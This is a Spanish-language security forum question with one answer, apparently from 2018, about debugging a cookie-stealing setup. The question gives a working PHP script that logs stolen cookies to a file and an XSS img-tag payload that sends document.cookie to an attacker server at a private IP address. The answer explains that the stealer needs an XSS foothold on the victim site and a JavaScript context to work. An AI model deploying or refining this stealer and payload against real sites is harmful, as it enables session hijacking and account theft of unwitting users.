Robo de cookies con redirección

0

Estoy intentando robar cookies para fines de aprendizaje y para eso he configurado un servidor de atacantes donde mi sitio web malicioso está ejecutando el robo de cookies de usuarios y funciona cuando visito como

enlace

Registra cualquier retención del parámetro c, en la cadena document.cookie del caso anterior.

El simple ladrón de cookies tiene las siguientes líneas de código

<?php
header('Location:https://google.com');
$cookies = $_GET["c"];
$file = fopen('log.txt', 'a');
fwrite($file, $cookies . "\n\n");
?>

El problema es cuando uso el mismo enlace en el atributo img tag src, no registra nada en el archivo log.txt. Estoy usando la siguiente publicación en el sitio vulnerable;

<img src="http://192.168.8.102/cookiestealer.php?c="+document.cookieonerror="alert('Your cookie has been served')" />

Pero no registra nada en el servidor. Sin embargo, el archivo cambia a medida que el editor me pide que vuelva a cargar, pero no hay nada escrito sobre él. No hay HTTPOnly = true para ninguna cookie en este sitio.

¿Alguna sugerencia? Gracias.

    
pregunta aneela 27.05.2018 - 12:22
fuente

1 respuesta

3

Estás utilizando una rutina de javascript (document.cookie) en HTML sin entrar en el contexto de javascript. Es útil en estos casos, mirar la fuente de la página que se genera, que a menudo hace que sea más fácil de entender.

Para aprovechar su ladrón de cookies, necesitaría un XSS en el sitio de la víctima. En el caso más común, eso le permite salir de la etiqueta HTML y comenzar a escribir javascript (es decir, ">

Como nota al margen, siempre puede revisar sus registros de acceso para las solicitudes que llegan a su ladrón de cookies, sin necesidad de un programa php separado para registrarlas.

    
respondido por el Egret 27.05.2018 - 18:03
fuente

Lea otras preguntas en las etiquetas